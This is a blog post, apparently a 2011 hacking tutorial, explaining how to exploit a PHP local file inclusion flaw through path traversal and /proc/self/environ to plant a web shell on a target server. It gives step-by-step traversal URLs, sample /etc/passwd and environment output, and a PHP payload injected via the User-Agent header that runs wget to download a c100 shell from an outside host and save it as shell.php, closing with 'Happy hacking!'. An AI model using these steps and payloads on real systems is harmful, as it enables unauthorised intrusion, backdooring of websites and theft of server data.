How to plant a shell through the LFI (Local file disclosure) by the method proc / self / environ
Writer: gunslinger_
with this tutorial I will explain how to create a shell on the target server through the LFI method proc / self / environ.Ok we just ...
1. we find the websites that are vulnerable to attack by LFI.
example: http://site.com/info.php?file=news.php
2. let's replace the "news.php" with "../../../".
example: http://site.com/info.php?file=../../../
then we got an error, as follows ...
Warning: include (../../../) [function.include]: failed to open stream: No such file or directory in / home / Gunslinger / public_html / info.php on line 99
ok it seems, we have the opportunity to take advantage of include into another file.selanjutanya we try to find / etc / passwd.
example: http://site.com/info.php?file=etc/passwd
But we still got an error like the following:
Warning: include (/ etc / passwd) [function.include]: failed to open stream: No such file or directory in / home / Gunslinger / public_html / info.php on line 99
what if we directorynya Raise?let's try ...
example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoy, we managed to get the file / etc / passwd file that looks like the following:
root: x: 0:0: root: / root: / bin / bashdaemon: x: 1:1: daemon: / usr / sbin: / bin / shbin: x: 2:2: bin: / bin: / bin / shsys: x: 3:3: sys: / dev: / bin / shsync: x: 4:65534: sync: / bin: / bin / syncgames: x: 5:60: games: / usr / games: / bin / shman: x: 6:12: man: / var / cache / man: / bin / shlp: x: 7:7: lp: / var / spool / lpd: / bin / shmail: x: 8:8: mail: / var / mail: / bin / shnews: x: 9:9: news: / var / spool / news: / bin / shuucp: x: 10:10: uucp: / var / spool / uucp: / bin / shproxy: x: 13:13: proxy: / bin: / bin / shwww-data: x: 33:33: www-data: / var / www: / bin / shbackup: x: 34:34: backup: / var / backups: / bin / shlist: x: 38:38: Mailing List Manager: / var / list: / bin / shirc: x: 39:39: IRCd: / var / run / IRCd: / bin / shGNATS: x: 41:41: GNATS Bug-Reporting System (admin): / var / lib / GNATS: / bin / shnobody: x: 65534:65534: nobody: / nonexistent: / bin / shlibuuid: x: 100:101:: / var / lib / libuuid: / bin / shsyslog: x: 101:102:: / home / syslog: / bin / falseklog: x: 102:103:: / home / klog: / bin / falsehplip: x: 103:7: HPLIP system user ,,,:/ var / run / hplip: / bin / falseavahi-autoipd: x: 104:110: Avahi daemon AutoIP ,,,:/ var / lib / avahi-autoipd: / bin / falsegdm: x: 105:111: Gnome Display Manager: / var / lib / gdm: / bin / falsesaned: x: 106:113:: / home / saned: / bin / falsepulse: x: 107:114: PulseAudio daemon ,,,:/ var / run / pulse: / bin / falsemessagebus: x: 108:117:: / var / run / dbus: / bin / falsepolkituser: x: 109:118: PolicyKit ,,,:/ var / run / PolicyKit: / bin / falseavahi: x: 110:119: Avahi mDNS daemon ,,,:/ var / run / avahi-daemon: / bin / falsehaldaemon: x: 111:120: Hardware abstraction layer ,,,:/ var / run / hald: / bin / falseGunslinger: x: 1000:1000: gunslinger_ ,,,:/ home / Gunslinger: / bin / bashsnmp: x: 112:65534:: / var / lib / snmp: / bin / falseguest: x: 113:124: Guest ,,,:/ tmp / guest-home.rRZGXM: / bin / bashsshd: x: 114:65534:: / var / run / sshd: / usr / sbin / nologin
3. let us check whether / proc / self / environ can we access?Now, replace "/ etc / passwd" with "/ proc / self / environ"
example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
If you get something like this:
DOCUMENT_ROOT = / home / Gunslinger / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0.9, application / xhtml + xml, image / png, image / jpeg, image / gif, image / x-xbitmap , * / *; q = 0.1 HTTP_COOKIE = PHPSESSID = 3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST = www.site.com HTTP_REFERER = http://www.site.com/index.php?view=../../../../ .. / .. / etc / passwd HTTP_USER_AGENT = Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx. 4x.1xx REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron SCRIPT_FILENAME = / home / Gunslinger / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = gunslinger@site.com SERVER_NAME = www.site.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/2.2.11 (Unix) DAV / 2 mod_ssl/2.2.11 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 OpenSSL/0.9.8k Server at www.site.com Port 80
Apparently proc / self / environ can we access!if you get a blank page (blank) / proc / self / environ can not be accessed or may beroperating system * BSD
4. Now let us dengann malicious code injection with poison http-header. how can we menginjeksinya? we can use the tamper data in firefox addon.you can download here: https://addons.mozilla.org/en-US/firefox/addon/966open the tamper data in firefox and then enter the url / proc / self / environ that had "http://site.com/info.php?file=../../../../../../. . / .. / .. / proc / self / environ "then the user-agent fill in the following code:view sourceprint?1 <? System ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
orview sourceprint?1 <? Exec ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
then submit.
5. if we managed to inject malicious code below, then the shell will be there in a place like this.
www.http://site.com/shell.php
Happy hacking!
Our Sponsors
Search Box
Labels
- Hacking (2)
- han (1)
- Linux (1)
- Network (3)
- Programing (2)
- Source Code (1)
- Tweaking (1)
- Web Design (2)
Popular Posts
-
Ciri2 seorang hacker: 1.temen hidup dia adalah PC,Laptop..atau sebagainya. 2.jarang besosialisasi dengan dunia luar. 3.aktif dalam foru...
-
Kecewa atau tidak, semua tergantung Anda, tergantung bagaimana Anda menyikapi kegagalan. Berharap sedikit hanya akan menghambat Anda men...
-
Screenshot Situs Kominfo yang Disusupi (Ist.) Jakarta - Entah karena ingin mengekspresikan kekecewaan terhadap pemerintah atau karena...
-
Jakarta, CyberNews. Pengamat TI Onno W Purbo mengemukakan ada puluhan ribu peretas dunia maya di Indonesia. "Indonesia memiliki 65 ri...
-
Seluruh dunia kini sangat tergantung dengan komputer. Segala sistem kini telah terkomputerisasi, mulai dari perbankan, perdagangan, perbel...
-
Mimpi yang bernilai tinggi otomatis membutuhkan pengorbanan dan kerja yang tinggi pula. Anggraini Lubis. Aplikasi atau tindakanlah yang m...
-
Ilustrasi MEDAN - Gempa berkekuatan 6,7 SR mengguncang Aceh dan Medan, Sumatera Utara Selasa dinihari. Gempa yang ...
-
Mohon maaf sebelumnya, saya sudah mencoba menghubungi pihak technical dari globaltv tapi belum ada respon, saya tidak bermaksud untuk merus...
-
It was interesting observing the flurry of Facebook integration announcements in the past 24 hours, especially regarding music services. ...
-
Assuming you have purchased a Linux Mint CD or created one yourself, you may reach the graphical installer by inserting the installation CD...
My Blog Chart
Global Map
Live Traffic
Link exchange
Poll
VISITORS COUNTRY FLAG'S
Follower's my blog's
Search This Blog
Labels
- Hacking (2)
- han (1)
- Linux (1)
- Network (3)
- Programing (2)
- Source Code (1)
- Tweaking (1)
- Web Design (2)
About Me
- Penggemar Angkringan
- iam only ordinary person but my evil side maybe dangerous
Blog Archive
-
▼
2011
(46)
- ► 09/25 - 10/02 (2)
- ► 09/18 - 09/25 (6)
- ► 09/04 - 09/11 (9)
- ► 08/28 - 09/04 (5)
- ► 08/21 - 08/28 (13)
- ▼ 07/17 - 07/24 (7)
- ► 07/03 - 07/10 (4)
© 2011 My Blog is my style . All Rights Reserved.